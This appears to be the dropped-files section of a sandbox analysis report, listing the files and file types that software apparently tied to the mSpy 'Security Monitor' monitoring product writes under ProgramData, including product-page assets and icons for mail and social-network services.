C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\IM.ini (copy)
Generic INItialization configuration [Zoom]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\default.ini (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\is-AIC3K.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\is-OEEOJ.tmp
Generic INItialization configuration [Zoom]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\ru\default.ini (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\ru\is-L5R5S.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\zh\default.ini (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\zh\is-QP01R.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\1.html (copy)
HTML document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\business-analyt-sprite.png (copy)
PNG image data, 1122 x 60, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\green_action_btns.png (copy)
PNG image data, 210 x 336, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\is-7FI0D.tmp
PNG image data, 210 x 336, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\is-Q1V98.tmp
PNG image data, 1122 x 60, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_block.png (copy)
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_cal.png (copy)
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_chat.png (copy)
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_device1.png (copy)
PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_gps.png (copy)
PNG image data, 66 x 67, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_rest.png (copy)
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_web.png (copy)
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-51P5T.tmp
PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-6BUHR.tmp
PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-9GTUL.tmp
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-C4I5G.tmp
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-GQ2IH.tmp
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-IS7L4.tmp
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-M79P5.tmp
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-N8TBJ.tmp
PNG image data, 66 x 67, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\logos.png (copy)
PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\is-VSD7S.tmp
HTML document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\anythingslider.css (copy)
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\blue-arr-buy.png (copy)
PNG image data, 52 x 44, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\core-ui-select.css (copy)
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\ic_device1.png (copy)
PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-AOB0E.tmp
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-DFHOU.tmp
PNG image data, 80 x 80, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-L5VCB.tmp
PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-P22IA.tmp
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-QRTS4.tmp
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-RT31F.tmp
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-SBJET.tmp
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-SG2PR.tmp
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-SSVU5.tmp
PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-T91A6.tmp
PNG image data, 52 x 44, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-VGS5B.tmp
PNG image data, 520 x 260, 8-bit/color RGB, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\logos.png (copy)
PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\main.css (copy)
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\mspy_products_home_slide1.png (copy)
PNG image data, 520 x 260, 8-bit/color RGB, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\photo1.png (copy)
PNG image data, 80 x 80, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\print.css (copy)
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\reset.css (copy)
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\widgets.css (copy)
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\GMX.com.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\GMX.com.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Gmail.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Gmail.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Mail.RU.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Mail.RU.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Mail.com.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Mail.com.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Outlook Mail.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Outlook Mail.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Outlook.Live.com.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Outlook.Live.com.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Yahoo Mail.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Yahoo Mail.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Yandex Mail.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Yandex Mail.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\facebook.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\facebook.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\google+.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\google+.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\imp.free.fr.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\imp.free.fr.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\instagram.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\instagram.png (copy)
PNG image data, 16 x 16, 8-bit colormap, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-1T2SC.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-3G17H.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-4LKQ0.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-59G9D.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-5MVFR.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-7A76O.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-7A8F5.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-7MDAN.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-8NCJ5.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-9QOV8.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-9R6DJ.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-A9KFE.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-AH09A.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-BED91.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-BGT52.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-BUT4O.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-CHI3B.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-CI83B.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-CMJBG.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-COH3S.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-D2TJO.tmp
PNG image data, 16 x 16, 8-bit colormap, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-GCTVR.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-GI2H6.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-H3BUC.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-HFABH.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-I9S3K.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-IHUVN.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-ILMP7.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-KA5ML.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-KJ09E.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-KRID3.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-L42H5.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-L50OI.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-LQULB.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-MBMIR.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-MOBTF.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-ONFO1.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-PKKMK.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-Q6G01.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-S1IC5.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-S9EUK.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-TFJD8.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-UH7LN.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-UKBC1.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\linkedin.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\linkedin.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\mail.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\mail.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\messagerie.orange.fr.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\messagerie.orange.fr.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\my.screenname.aol.com.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\my.screenname.aol.com.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\myspace.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\myspace.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\odnoklassniki.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\odnoklassniki.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\qqzone.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\qqzone.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\twitter.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\twitter.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\vkontakte.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\vkontakte.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\youtube.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\youtube.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\GMX.com.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Gmail.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Mail.RU.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Mail.com.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Outlook Mail.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Outlook.Live.com.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Yahoo Mail.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Yandex Mail.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\facebook.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\google+.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
